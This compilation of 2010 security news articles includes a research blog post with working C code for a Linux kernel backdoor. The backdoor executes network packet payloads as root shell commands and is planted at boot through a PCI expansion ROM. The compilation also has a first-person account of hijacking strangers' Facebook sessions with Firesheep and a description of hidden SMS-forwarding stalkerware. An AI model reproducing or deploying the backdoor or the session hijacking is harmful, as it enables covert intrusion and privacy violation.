But for anyone who wants to do their fellow network users a favor and really screw with anyone using Firesheep, one Icelandic hacker has come up with a more aggressive solution: FireShepherd. Gunnar Atli Sigurdsson, a 21-year-old electrical engineering student at the University of Iceland, designed the program to run on a user’s desktop and periodically jam the local wireless network with a string of junk characters that Sigurdsson says will instantly crash Firesheep when the snooping program reads them.

“It’s really basic,” he says. “It pretty much just floods the wireless network with packets that crush Firesheep and turns it off.”

By default, those jamming signals are broadcast every 400 milliseconds. But they can be adjusted to the user’s preference to best confuse and frustrate would-be Wifi spies.

Sigurdsson sympathizes with the mission of Firesheep’s creator, a security researcher who hoped to demonstrate the insecurity of accessing unsecured Wifi networks without encrypted connections. But now that more than 200,000 users have downloaded the program in just a few days, he says he’s grown uneasy with the results. “I really didn’t like the concept of everyone living in a house with nothing but windows,” he says.

Since Fireshepherd uses a vulnerability in Firesheep, someone may soon create a patch for the open-source program that nullifies Sigurdsson’s jamming technique. But if that happens, he says he’ll search out another vulnerability and update the tool. “Programs usually have more than one bug,” he says.

You can download FireShepherd here.

Herding Firesheep in New York City
Gary LosHuertos

There's been a lot of talk about Firesheep over the last few days. The free Firefox extension collects cookies that have been broadcast over an unprotected WiFi network without using SSL. You turn it on, it collects cookies for Facebook, Twitter, and 24 other sites (by default). Then, you can sidejack the account and gain access under the acquired identity.

This extension isn't shocking. If you're worth your weight as a developer, you've known this flaw has existed for a long time, right? But what about the rest of the world? What about the people who haven't heard about the newly accessible threat through their friends, through Engadget, through Slashdot, or through ABC ProNews7 in Amarillo?

I thought I'd spread the word and help some laymen out after work since there's a large Starbucks near my apartment. I dropped in, bought some unhealthy food, opened my laptop and turned on Firesheep. Less than one minute later, there were five or six identities sitting in the sidebar. Three of them were from Facebook.

This wasn't at all surprising; Firesheep is not magical, and anyone that's been to a Starbucks knows that a lot of people mindlessly refresh Facebook while sipping on their lattes. I thought I'd give it more time, so I listened to some music, talked to a few friends, and most importantly (and difficultly) did not navigate to anything sent over vanilla HTTP (including, of course, Facebook).

Around half an hour later, I'd collected somewhere between 20 and 40 identities. Since Facebook was by far the most prevalent (and contains more personal information than Twitter) I decided to send the users messages from their own accounts to warn them of their accounts' exposure. I drafted a friendly, generic message that stated the location of the Starbucks, what the vulnerability was, and how to avoid it. I sent messages to around 20 people.

I cleared the sidebar, took off my headphones, and waited. I heard one expletive muttered a few feet away, and wondered if my message was the cause. Over the next 15 minutes, I didn't hear anyone talk about what had happened (and folks at Starbucks are usually not ones to keep their conversations private). However, what I did see happen was a sharp decline in the number of identities I was collecting when I restarted Firesheep.

This was relieving -- these people got the message. Hopefully they'll tell their friends, hide their kids, hide their wives. I cleared the sidebar once again, and after another twenty minutes of mindless conversation I saw five familiar names had returned to my herd.

This was somewhat puzzling. Did they receive the first message? I logged into their accounts, and surely enough, they had. One of them was even on Amazon.com, which I had warned about in my first message. I targeted him first: I opened up his Amazon homepage, identified something he had recently looked at, and then sent him a "no, seriously" message on Facebook from his account including the fun fact about his music choices.

I cleared again, waited for ten minutes, and after resuming Firesheep's collection it appeared that he was gone. Yet the other four remained persistent. Perhaps, I thought, they thought the message was automatically generated and randomly targeted (despite mentioning their location within 100 feet). So, one last message was in order.

I drafted a very short message (perhaps the first was too long?) and sent it to the four, once again from their own accounts:

Really wasn't kidding about the insecurity thing. I won't send another message after this -- it's up to you to take your security seriously. You're at the [XYZ Street] Starbucks on an insecure connection, and absolutely anyone here can access your account with the right (free) tool.

Twenty minutes passed, and all four were still actively using Facebook. Again, I considered that they may not have received the second message, but after viewing their accounts it was clear that they had.

This is the most shocking thing about Internet security: not that we are all on a worldwide system held together with duct tape that has appalling security vulnerabilities; not that a freely available tool could collect authentication cookies; and certainly not that there are people unaware of either. What's absolutely incomprehensible is that after someone has been alerted to the danger (from their own account!) that they would casually ignore the warning, and continue about their day.

But, I kept my word and did not send another message. I packed my things, I walked around the store, and recognized several of the people I'd just introduced to their own vulnerability. I included no clues as to my identity, less because of fear of retribution, and more because invasion of privacy is all the more frightening when it is committed by an absolute stranger with no chance of discovering their identity.

On my way home, I considered what the experience meant about our society. No matter how many security measures we provide to the world, there will always be people who leave the door open, even after they've had an intruder. The weakest link in security has been, and always will be, the user's judgement.

Back at my apartment, I began to settle in -- only to realize that throughout the entire night, my fly had been wide open. Just another demonstration: we're all walking around with vulnerabilities we have yet to discover.

The Advantages of MiFi Cards Over Built-In 3G in Netbooks, iPads, e-Readers, and Other Mobile Devices
Ryan Faas

A built-in 3G connection may seem like a great feature, but could be limiting and costly in the long run.

Earlier this week, I touched on MiFi cards as an alternative to using public Wi-Fi networks as a way to avoid being a victim of Firesheep (a Firefox extension that makes it easy for anyone using a wireless network that doesn't require a password to hijack accounts/sessions of common social networking sites). That may be a good reason to consider a MiFi card, but the primary reason for purchasing one is that they allow you to connect to a mobile carrier's 3G or 4G network wherever you are and to share that connection with up to five devices using Wi-Fi.

Usually MiFi cards are used by professionals on the road who need to connect their laptops to the Internet and who don't want to have to scramble trying to find a Starbucks (or other free Wi-Fi location) and who don't want to have to pay the typically high prices for Internet access in most chain hotels and airports. Since the devices work anywhere there's coverage, they also work while in a car, on a train, or in Wi-Fi-free locations.

An interesting comment from Sprint today illustrated some interesting advantages to MiFi cards as we move to a less laptop-centric mobile world in the new era of tablets. In an interview with GigaOm's Om Malik, Sprint's CEO Dan Hesse noted that the iPad has been good for the company – a somewhat surprising statement from Sprint considering the iPad 3G only works with AT&T in the U.S. and couldn't connect to Sprint's CDMA network (or Verizon's) even if AT&T wasn't the exclusive carrier in this country.

What Hesse was referring to isn't the iPad 3G, it was the less expensive Wi-Fi only tablet. Sprint doesn't sell those iPads either, but did release its own iPad case this spring that ships with a Sprint Overdrive MiFi device (the case includes a pocket specifically designed to hold the Overdrive) that supports both 3G and significantly faster 4G network connections. So far, Sprint has rolled out 4G service to many large population centers before its national competitors, making its MiFi solution better for users who need fast connections than the iPad 3G or MiFi cards from other providers.

Obviously, this illustrates that users are happy to choose the advantages of a 4G connection (if unavailable, the Overdrive reverts to using 3G) even if it's not built into the iPad, rather than opt for a slower iPad 3G (the generally noted speed range of 4G is 3 to 6 Mbps, considerably faster than the 600 Kbps to 1 Mbps offered by 3G).

There are other advantages to choosing a Wi-Fi-only model over the integrated 3G one as well (worth noting since the Wi-Fi iPad went on sale at Verizon stores yesterday, where it can be purchased along with a 3G Wi-Fi card with discounted data plans) – and these advantages aren't just limited to the iPad. They apply to any devices that offer a choice between Wi-Fi and integrated 3G models including many netbooks, e-readers like the Kindle and Nook, and the forthcoming Android-based Galaxy Tab.

Some of the big advantages are:

* Multiple devices (not just an iPad, e-reader, or notebook) – big plus for families
* Choice of carriers – including regional carriers (pick the best network, and best service plan for you)
* Potential discount if added to an existing service plan (depends on the carrier)
* Optional 4G (where available)
* Potential for contract-free/prepaid service from the likes of Cricket and Virgin Mobile (great if you don't need service all the time)
* Ease of upgrade (4G service is expected to be available from all major carriers soon and you'll probably want the faster speed when it's available without replacing each 3G device)

While a MiFi solution may not be a need for everyone, it's certainly worth considering and examining the potential total cost of ownership for a device over a few years (particularly if you're looking at a carrier-subsidized tablet or netbook that will offer lower investment in the device itself but tie you to a contract specific to that device).

Android App Forwards Private Text Messages
Nick Bilton

DLP Mobile Promotional video for Secret SMS Replicator.

If you own an Android phone and are cheating on a significant other by arranging secret trysts through text messages, you might want to think twice about your infidelities — or at least about arranging them via texts.

A new Android application released Wednesday, Secret SMS Replicator, when secretly installed on a cellphone, will forward all text messages to any other phone without the owner’s knowledge.

Zak Tanjeloff, chief executive of the app’s creator, DLP Mobile, said in a press release: “This app is certainly controversial, but can be helpful to people in relationships where this type of monitoring can be useful.”

DLP Mobile also boasts about the clandestine nature of the application: “The app is unique because there is no visible icon or shortcut to access it, so once it’s installed, it will continue to monitor without revealing itself.”

DLP Mobile is behind the Mirror App for the iPhone 4 and says it creates about 100 applications a year for the iPhone and Android.

Mr. Tanjeloff said in a phone interview that his company decided to build the SMS application for the Android platform because it would not need to be reviewed before it reached users.

“We can’t build it for the iPhone because it wouldn’t make it past the App Store approval process,” Mr. Tanjeloff said.

Some might argue that this app makes the approval process look like a good idea.

For those who want to avoid having their text messages tapped, Mr. Tanjeloff suggested “keeping your phone close by, or make sure people trust you.”

Hackers Exploit Newest Flash Zero-Day Bug

Adobe confirms attacks using rigged PDFs, promises fixes next month as more problems plague Flash, Reader
Gregg Keizer

Adobe today confirmed that hackers are exploiting a critical unpatched bug in Flash Player, and promised to patch the vulnerability in two weeks.

The company issued a security advisory that also named Adobe Reader and Acrobat as vulnerable.

"There are reports that this vulnerability is being actively exploited in the wild against Adobe Reader and Acrobat," said Adobe in its warning. The company said it's seen no sign that hackers are also targeting Flash Player itself.

Those reports came from Mila Parkour, an independent security researcher who notified Adobe early today after spotting and then analyzing a malicious PDF file. According to Parkour, the rigged PDF document exploits the Flash bug in Reader, then drops a Trojan horse and other malware on the victimized machine.

Adobe said that all versions of Flash on Windows, Mac, Linux and Android harbored the bug, and that the "Authplay" component of Reader and Acrobat 9.x and earlier also contained the flaw. Authplay is the interpreter that renders Flash content embedded within PDF files.

Last month, Parkour uncovered a bug in Reader's font-rendering technology that was exploited by attack campaigns using bogus messages from renowned golf coach David Leadbetter as click bait.

Today's vulnerability, however, is more reminiscent of one reported in June that also involved Authplay. Adobe issued an emergency patch for Flash Player within a week, and followed with a fix for Reader and Acrobat two weeks later.

Adobe will patch this newest bug in a similar fashion. Today it promised to issue a fix for Flash by Nov. 9, and updates for Reader and Acrobat the following week.

Danish vulnerability tracker Secunia ranked the Flash flaw as "extremely critical," its highest threat ranking, and said criminals could use it to compromise systems and execute malicious code.

Security experts have regularly criticized Adobe Flash's security, with some questioning the company's decision to integrate the media player's capabilities within the almost-as-popular Reader. Adobe has countered those arguments with its own, saying that many users rely on the functionality.

Until a patch is available, users can protect themselves from active attacks by deleting the "authplay.dll" file that ships with Reader and Acrobat. Adobe gave the same advice in June when the earlier Flash vulnerability was reported.

Dumping authplay.dll, however, will crash Reader and Acrobat or produce an error message when the software opens a PDF file containing Flash content.

Today's Flash flaw disclosure was the second Adobe's acknowledged since the technology was ported to Google's Android operating system two months ago.

Although Adobe tries to hew to a quarterly patch schedule for Reader and Acrobat, it's repeatedly been forced to scuttle those plans to issue rush fixes for critical bugs. The next regularly-scheduled Reader update was not supposed to land until Feb. 8, 2011.

At times, Adobe has abandoned scheduled Reader updates after shipping an "out-of-band" patch, but that's unlikely here as the company is in the early days of its next patch cycle.

Hosting Backdoors in Hardware

Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors?

In some cases, that may not be enough. In this blog post, we’re going to describe how we can gain full control of someone’s machine by giving them a piece of hardware which they install into their computer. The backdoor won’t leave any trace on the disk, so it won’t be eliminated even if the operating system is reinstalled. It’s important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed.

I’ll let you figure out the social engineering side of getting the hardware installed (birthday “present”?), and instead focus on some of the technical details involved.

Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We’re going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it’s mainly just a matter of engineering effort to support a wide range of kernels.

Modifying the kernel with a kernel module

The easiest way to modify the behavior of our kernel is by loading a kernel module. Let’s start by writing a module that will allow us to remotely control a machine.

IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We’re going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we’ll execute its data payload in a shell running as root. This will give us complete remote control of the machine.

The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this:

int exec_packet(struct sk_buff *skb)
{
    char *argv[4] = {"/bin/sh", "-c", skb->data, NULL};
    char *envp[1] = {NULL};

    call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT);

    return 0;
}

We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded:

const struct net_protocol proto163_protocol = {
    .handler = exec_packet,
    .no_policy = 1,
    .netns_ok = 1
};

int init_module(void)
{
    return (inet_add_protocol(&proto163_protocol, 163) < 0);
}

Let’s build and load the module:

rwbarton@target:~$ make
make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic'
CC [M] /home/rwbarton/exec163.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/rwbarton/exec163.mod.o
LD [M] /home/rwbarton/exec163.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic'
rwbarton@target:~$ sudo insmod exec163.ko

Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine:

rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload
rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip

rwbarton@target:~$ ls -l /tmp/x
-rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x

Great! It worked. Note that we have to send a null-terminated string in the payload, because that’s what call_usermodehelper expects to find in argv and we didn’t add a terminator in exec_packet.

Modifying the on-disk kernel

In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we’re just going to give a high-level overview of what needs to be done.

The kernel lives in the /boot directory; on my test system, it’s called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We’re going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section.

When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us:

1. it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections;
2. it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants;
3. it ran our init_module function.

We have to address each of these points in figuring out how to apply our changes without making use of the module loader.

The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel’s startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code.

The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module’s code and data, but we need to make our changes before the kernel has started running, so the memory allocator won’t be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we’d still have to find somewhere to store that extra code.

What we’re going to do is cheat and find some data which isn’t used for anything terribly important, and overwrite it with our own data. In general, it’s hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it’s unlikely to ever be triggered. We’ll need well under 180 bytes for our data, so let’s look for strings in the kernel image which are at least that long:

rwbarton@target:~$ strings vmlinux | egrep '^.{180}' | less

One of the output lines is this one:

<4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file.

This sounds pretty obscure to me, and a Google search doesn’t find any occurrences of this message which aren’t from the kernel source code. So, we’re going to just overwrite it with our data.

Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don’t expect the decompression to fail, because we didn’t modify the compressed image at all. So we’ll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel.

Modifying the kernel during the boot process

Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that?

The PCI specification defines an “expansion ROM” mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process.

When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record.

On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO.

Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we’ll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn’t know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we’re going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that’s just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it.

In summary, the boot process of the system with our PCI card inserted looks like this:

* The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table.
* The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk.
* The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB.
* GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning.
* GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163].
* The startup code of the decompressed kernel runs and installs our handler in inet_protos[163].
* The kernel continues to boot normally.

We can now control the machine remotely over the Internet by sending it packets with protocol number 163.

One neat thing about this setup is that it’s not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all.

What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn’t realistically worry about installing commodity hardware from reputable vendors. After all, you’re already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware.
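Because the backdoor described above leaves nothing on disk, the one artifact a defender can still observe is its trigger on the wire: an IPv4 packet whose protocol field is 163. The Python sketch below is an added example, not code from the original article; it parses raw IPv4 packets and flags any whose protocol number falls outside an allowlist. The allowlist, the addresses and the sample packets are constructed assumptions.

```python
import ipaddress
import struct

# Assumption: the IP protocols this network is expected to carry. Tune per site.
EXPECTED_PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP", 47: "GRE", 50: "ESP"}


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 header checksum: folded one's-complement sum, inverted."""
    total = sum(word for (word,) in struct.iter_unpack("!H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def parse_ipv4(packet: bytes) -> dict:
    """Parse one raw IPv4 packet; raise ValueError if it is malformed."""
    if len(packet) < 20:
        raise ValueError("shorter than the minimum IPv4 header")
    (ver_ihl, _tos, total_len, _ident, _frag, _ttl, proto, _cksum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4  # header length in bytes, options included
    if ihl < 20 or ihl > len(packet):
        raise ValueError("bad header length")
    if total_len < ihl or total_len > len(packet):
        raise ValueError("total length disagrees with captured bytes")
    return {
        "protocol": proto,
        "src": str(ipaddress.IPv4Address(src)),
        "dst": str(ipaddress.IPv4Address(dst)),
        # A valid header sums to zero when its checksum field is included.
        "checksum_ok": ipv4_checksum(packet[:ihl]) == 0,
        "payload": packet[ihl:total_len],
    }


def preview(payload: bytes, limit: int = 40) -> str:
    """Printable text up to the first NUL byte, for analyst triage only."""
    text = payload.split(b"\x00", 1)[0][:limit]
    return "".join(chr(b) if 32 <= b < 127 else "." for b in text)


def audit(packets, expected=EXPECTED_PROTOCOLS) -> list:
    """Return one finding per malformed packet or unexpected protocol."""
    findings = []
    for index, raw in enumerate(packets):
        try:
            pkt = parse_ipv4(raw)
        except ValueError as exc:
            findings.append({"index": index, "reason": f"malformed: {exc}"})
            continue
        if pkt["protocol"] not in expected:
            findings.append({
                "index": index,
                "reason": "unexpected protocol",
                "protocol": pkt["protocol"],
                "src": pkt["src"],
                "dst": pkt["dst"],
                "checksum_ok": pkt["checksum_ok"],
                "payload_preview": preview(pkt["payload"]),
            })
    return findings


def sample_packet(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Build a constructed sample packet in memory (test data, never sent)."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0,
                         64, proto, 0, ipaddress.IPv4Address(src).packed,
                         ipaddress.IPv4Address(dst).packed)
    cksum = ipv4_checksum(header)
    return header[:10] + struct.pack("!H", cksum) + header[12:] + payload


# Constructed samples: two ordinary packets, one with the article's protocol
# number and payload, and one truncated capture.
SAMPLE_PACKETS = [
    sample_packet("192.0.2.10", "192.0.2.20", 6, b"\x00" * 20),
    sample_packet("192.0.2.11", "192.0.2.20", 17, b"\x00" * 8),
    sample_packet("198.51.100.7", "192.0.2.20", 163, b"touch /tmp/x\x00"),
    b"\x45\x00\x00",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_PACKETS):
        print(finding)
```

Feed it packets captured at a network tap or gateway rather than on the suspect host, since a kernel modified this way cannot be trusted to report its own traffic.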

Inside Google's Anti-Malware Operation
Dennis Fisher

A Google malware researcher gave a rare peek inside the company's massive anti-malware and anti-phishing efforts at the SecTor conference here, and the data that the company has gathered shows that the attackers who make it their business to infect sites and exploit users are adapting their tactics very quickly and creatively to combat the efforts of Google and others.

While Google is still a relative newcomer to the public security scene, the company has deployed a number of services and technologies recently that are designed to identify phishing sites as well as sites serving malware and prevent users from finding them. The tools include the Google SafeBrowsing API and a handful of services that are available to help site owners and network administrators find and eliminate malware and the attendant bugs from their sites.

All of these are related to Google's constant crawling of the Web, which, among many other things, allows the company to identify malware-distribution sites as well as legitimate sites that have been compromised with injected malicious code. Attackers have taken to infecting legitimate sites for a number of reasons, one of which is that those sites will show up more prominently in Google search results.

To find malware-distribution sites, Google uses a huge number of virtual machines running completely unpatched versions of Windows and Internet Explorer that they point at potentially malicious URLs. The company then ties this in with the data that it gathers from its automated crawlers that are tasked with looking for malicious code on legitimate Web sites.

Fabrice Jaubert, of Google's anti-malware team, said that the company has had good luck identifying and weeding out malicious sites of late. Still, as much as 1.5 percent of all search result pages on Google include links to at least one malware-distribution site, he said.

"There's a lot of fluctuation in that over time, and that could be due to a lot of factors. It could be due to a change in the pages, it could be a change in our detection rate and also in the popularity of the infected pages," Jaubert said. "The biggest factor is that we've found a substantial number of malware pages are spammy and have no content. We remove those pages. But it's a cat-and-mouse game, just like viruses and AV. We go and find bad pages and they get better at hiding them."

A major part of this infection and distribution ecosystem is the huge population of Web servers with unpatched vulnerabilities, which the attackers exploit in order to inject malicious code. That code, often in hidden iFrames, typically redirects users to another site where malware is installed on the victim's machine via a drive-by download.

However, Jaubert said that the attackers recently have shifted their tactics somewhat as Google and others involved in the battle against Web-based exploits have gotten better at identifying and eliminating malware download sites. Now, some crews have started eschewing the extra step of redirecting users to a third-party site and are simply loading the malware on the compromised legitimate site and using that site for malware distribution as well.

It's a subtle shift, but it removes the dedicated malware-distribution pages, which are usually easily identifiable, from the equation, making the operation more efficient and more likely to succeed in the long run.

Still, despite the vast amount of data that Google collects and analyzes, there's a lot about the way that the malware ecosystem works that the company's security teams don't have a firm grasp on yet.

"We don't understand all the details of this. We focus on the technical," Jaubert said. "There's monetization aspects that we don't have visibility into."

Most Americans Support an Internet Kill Switch

Sixty-one percent of Americans said the President should have the ability to shut down portions of the Internet in the event of a coordinated malicious cyber attack, according to research by Unisys.

The survey found that while Americans are taking proactive steps to protect themselves against cybercrime and identity theft, only slightly more than a third of Internet users in the U.S. regularly use and update passwords on their mobile devices – creating a potentially huge security hole for organizations as more consumer devices invade the workplace.

The findings illustrate that recent events such as the Stuxnet computer worm attack and the attempted Times Square car bombing may have heightened the American public's awareness of and concern over global and domestic cybersecurity threats.

The findings also suggest the public may support a pending cybersecurity bill that would give the President far-reaching authority over the Internet in the case of an emergency.

"A majority of the American population is willing to grant the President the authority to cut short their Internet access to protect both U.S. assets and citizens, suggesting that the public is taking cyber warfare very seriously," said Patricia Titus, VP and CISO, Unisys. "Our survey shows that the American public recognizes the danger of a cyber attack and wants the federal government to take an active role in extending the nation's cyber defense. It will be up to officials in all branches of the federal government to respond to this call to action in a way that is measured and well planned."

Mobile devices: A hole in American defenses?

The results also indicate that most Americans are being proactive in protecting themselves from cybercrime and identity theft. More than three-quarters (80%) of Americans regularly limit access to personal information posted to social media sites and make use of privacy settings; and 73% regularly update anti-virus software.

However, the majority of Americans surveyed are neglecting other important aspects of cybersecurity, particularly around their use of consumer devices. Only 37% of users surveyed say they are regularly using and updating passwords on their mobile devices. The survey also found that less than half of American Internet users (46%) regularly use and update hard-to-guess passwords on their computers.

Overall U.S. results

The Unisys Security Index surveys consumer opinion on four areas of security: financial, national, Internet and personal safety. More than 1,000 Americans responded to the latest survey. The results are tallied on a scale of 0-300, with 300 representing the highest level of perceived concern.

The overall score for the current Unisys Security Index for the United States was 136, indicating a moderate level of overall security concern. The overall score declined from 147 since the last survey taken in February 2010, reflecting a decrease in concern across all four areas of security.

National security and financial security continued to rank as the U.S. public's greatest areas of concern, with more than half (59%) "extremely" or "very" concerned about U.S. national security. In addition, 57% of Americans were seriously concerned about identity theft, and the same percentage is also seriously concerned about credit card and debit card fraud.

Americans' fear surrounding Internet security continues to be on the decline with the number of Americans "not concerned" about computer security in relation to viruses or spam increasing to 34%, the greatest number since the Index's inception. The most dramatic decline was reported in those "seriously concerned" about the security of shopping or banking online – from 43% in February 2010 to 34% in August 2010.

Global results

Unisys surveyed more than 10,575 consumers in 11 countries around the world about their current security concerns. Additional key global findings from the survey include:

• Security concerns were highest in Brazil, which reported an overall index score of 185, closely followed by Hong Kong with a score of 172. The Netherlands reported the lowest level of concern with an overall score of 71.
• Bank card fraud is the greatest single area of concern across all eleven countries surveyed. Despite the severity of the worldwide financial crisis, concern about bankcard fraud consistently overshadows concern about meeting financial obligations in countries with serious concerns about financial security.
• Most Europeans take the protection of their online privacy and identity seriously. In Germany, 28% of internet users switched banks or retailers because of unhappiness with their privacy and identity protection or have considered doing so.

Beaming to the Cloud All the Mess That Is Our Digital Life
Sarah J. Wachter

We used to wrestle with managing overstuffed closets and bookcases teetering on collapse. Now our digital closets are overflowing, too: Facebook wall messages. Tweets. LinkedIn profiles and messages. Family photo albums. A music collection from Gustav Mahler to Manu Chao.

Thanks to cloud computing, we now have seemingly limitless, Internet-based storage. But our files are scattered across devices — a smartphone, netbook, e-reader, U.S.B. keys, an MP3 player and a home computer.

Tech giants like Microsoft and Sony, as well as a number of start-ups, are starting to ferret out ways to help us put our electronic lives in order, offering content-management services that allow people to store their digital clutter and reach it from any device.

“We are overwhelmed with digital and virtual assets,” said Matt Anderson, an analyst with the research firm Booz & Co.

The challenge, analysts say, is being able to offer comprehensible and interoperable services for data originating from a plethora of electronic devices.

Booz estimates that the U.S. market for content management services will expand 50 percent over the next four years to hit $4 billion by 2012. Figures for the rest of the world are unavailable.

The business model for such services is in flux, analysts said, as companies experiment with free and fee-based models. A 2009 survey by Booz showed that consumers were willing to pay $9 a month to have a single digital repository for their data and an extra $3 a month to be able to transfer content among devices.

One company dipping its toe into content management is Sony, which will offer a video-on-demand service for home cinema, TV, Blu-ray and Windows laptops in Europe by the end of the year. Sony, which has been experimenting with different pay models, also has a monthly music subscription service, called Music Unlimited, that allows subscribers to find and share music from Sony devices and Windows laptops.

Sony says it will eventually open up those services to devices running on other operating systems and may make them accessible to Mac users, said Nick Sharples, director of European corporate communications for Sony.

